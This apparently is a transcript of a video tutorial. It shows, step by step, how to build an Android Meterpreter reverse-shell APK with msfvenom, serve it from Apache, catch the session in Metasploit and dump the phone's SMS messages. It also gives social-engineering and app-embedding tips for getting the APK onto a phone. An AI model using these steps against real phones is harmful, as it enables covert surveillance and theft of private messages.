Hey guys, welcome back to another episode on how to hack. So my name is Yang and I'll be your trainer and facilitator today. So over here on the screen, as you can see, on the left side we have an mobile device running, and on the right side we have kalilinux running. So kalilinux will be our hacker's box, and the mobile device will be the targeted computer or the targeted device that will be going after to pull out all of those text messages. So what we are going to do now is, on the right side, we have to create the payload. We have to create the APK file. So what you can see over here is that I have already created a command for you. So we just got to zoom in a little, and I will explain to you what all this means. So we're using MSFVenom. So this is part of the Metasploit framework. And of course, -P stands for platform. So we're using Android meterpreter reverse_TCP. So a reverse meterpreter shell for us to get a reverse connection into the mobile device. And of course, we have LHOST. So LHOST is actually the IP address of the listener. So in this case, if I enter IP space ADDR and I hit enter on that, I will be presented with the IP address of the kalilinux machine. So in this case, we have 192.168.0.106. And of course, for our case, we are going to create the APK file based on the LPORT of 4444. So of course, we'll output the file into /hacker.apk. So once you have this instruction ready, paste it onto your kalilinux box in the command prompt or in the terminal and go ahead and hit enter on that. So I'll go ahead and hit enter on that. And of course, I'll be prompted with the password because I'm using sudo for super user. So hit enter on that. And this would create the APK payload. So what we are going to do is that we need to have this installed into the device. One, installation onto the device either as a corporate issue or a company issue device, or two, it is through social engineering attacks, or you could embed it as part of a different APK file, like your different kind of applications that you can then present it to the user, and the user could download it, and from there on you will be able to get it running and you can have the reverse connection back to the device. So over here, as we can see, we have the payload size of 10,185 bytes. So all you got to do is transfer the file. So you can actually do a sudo move, for example, and we can move the /hacker.apk file to var html. So what we are doing this and why we're doing this is because we need a location to service the file so that people can access it, so that the target computers can access it, they can download it, and they can install it from there on. So in this case, we can go ahead and run the Apache web server. So all you got to do is enter systemctl. So this is part of Linux system administration. So this is a good command or good item to learn so that you can understand how you can control different kind of services inside your different Linux boxes. So this is a highly sought after skill, Linux administration. So we enter systemctl followed by space, and we can actually enter the status of Apache. So we can go ahead and hit enter on that. So it says that it is already running. So we have our web application server running. And on the left side, we have the mobile device. So of course, the APK can be downloaded from many places. And I just created a YouTube post about the importance of social engineering. So social engineering is a domain that is usually overlooked. So there are a lot of importance for it because I've seen a lot of demonstration as well as real life cases where the hackers provide a macro Excel file, like an Excel sheet or a Word document, and the user enable the macro scripts, and that continued running, and that took over the entire device very, very quickly. So those were the kind of attacks that we're seeing regularly to penetrate into very large companies. So these are the kind of tricks coupled with technological advancement in cyber attacks to actually launch those attacks against certain entities. All right. So now all we got to do is enter the IP address. So in this case, we have 192.168.0.106/ followed by hacker. And of course, we name our device over here from the output as hacker.apk. So we can enter hacker.apk and hit enter on that. So it would say that we can download the file. So we go ahead and download the file, click OK. So once the file has been downloaded, you can open it up and you can install it. So what I'm going to do now on the right side is I'm going to start up Metasploit console. So again, if you think about some of the use cases for us to install the software into the device, what the hackers are doing is that they're installing a lot of such software onto the mobile device before they actually ship it to the consumers, before they actually sell it through different kind of platforms in order for users to use that phone. And when the users use the phone, they are clueless. They have no idea that this phone already has a virus or a backdoor installed into the device. So these are the kind of tricks that the hackers are already using. So like I mentioned earlier, coupling social engineering as well as all this technical know-hows for the hackers to gain access to your credentials. All right. So moving forward, all I got to do is enter use exploit multi-handler, and we can actually set the payload as Android meterpreter reverse_TCP. All right, and we can enter show options. So we can set the LHOST as 192.168.0.106. So this is the IP address of the listener. This is the IP address of kalilinux in this case. So hit enter on that, and we have the LPORT as 4444. So everything is set properly. So all we got to do right now is enter exploit to run the listener. So we're listening right now, and we actually already have the software installed. So if I click onto the hacker APK, and you can see that this is an installation update to the existing application. So we have already installed the application. So all I got to do is go back into the mobile device, and if I go into the application page, all I got to do is search out for main activity. So again, the naming, the logos, the way the look and the feel of the application can be modified, and we will discuss about how we can embed such payloads into different kind of APK or different kind of applications. All right. So here I'm just going to go ahead and click on main activity, and immediately we would have access into the session. And what you're seeing right now is that you would not be able to visually see any kind of differences on the phone. So the phone is still able to run as per normal, and it can still surf the internet. You can still go to Google Maps. You can use many different of the features and functions as though your phone is as it is, but it has already been hacked by the hackers, and the hackers on the right side in kalilinux have full control and access to the device. And why is that the case? So let us explain a little more about why this is the case. So if I actually go under settings and I click onto the applications, so let us go into the application that has been installed in the device, so we can review the mobile application permissions. So if I click under apps, and over here we can see all the applications. So let us go into the application that we just installed. So it is called main activity, and let's hit enter on that. And we can look under permissions. So permissions is on the third row. So go ahead and click on that. And we can see that this application has all these different accesses into the phone. So it has the camera access, it has the context access, location, microphone, phone, SMS, and storage. So it means that even for mobile applications that you install into your phone right now, the user or the owner of the application, if they have all these app permissions, they will be able to see all of your data. They'll be able to pull out your contacts, your SMSs, and all this important information. So going back into the hackers box, we can enter help, and this will list out all the commands available for us to troll or to execute into the mobile device. So in my case, for example, I can enter app_list. So this would show us all the applications that are already installed inside the device. And we can see, for example, if you manage to break into one of the corporate devices owned by an enterprise, then you realize that such application could be mirrored across all those different devices. And many large enterprises run thousands, tens of thousands of devices. So not just in terms of security controls and policies for your mobile devices, but what about your laptops? What about your servers? What about your network devices, and so on? So all these different kind of security policies have to have a strong effect across all these different devices that you run in order to secure them against many of these potential hack. So of course, the main topic for today is dump _SMS. So with a very simple command, all you got to do is hit enter on that. And immediately you see that we have a file created onto our desktop over here on the left side. And immediately we can just open it up and we can see all of the text messages. So go ahead and open it up. And over here, we can see can transfer $500,000 for our cybersecurity project. And let's go back into the mobile device and we can click under the messages. And immediately you can see that there is a text message, an outgoing text message can transfer $500,000 here for our cybersecurity project. So there are a lot more instructions. There's a lot more commands that we can do as part of this Android hacking series. So do watch out, do stay tuned for more tutorials for you. So if you have learned something valuable in today's tutorial, remember to like, share, and subscribe to the channel so that you can be kept abreast of the latest cybersecurity tutorial. Thank you so much once again for watching.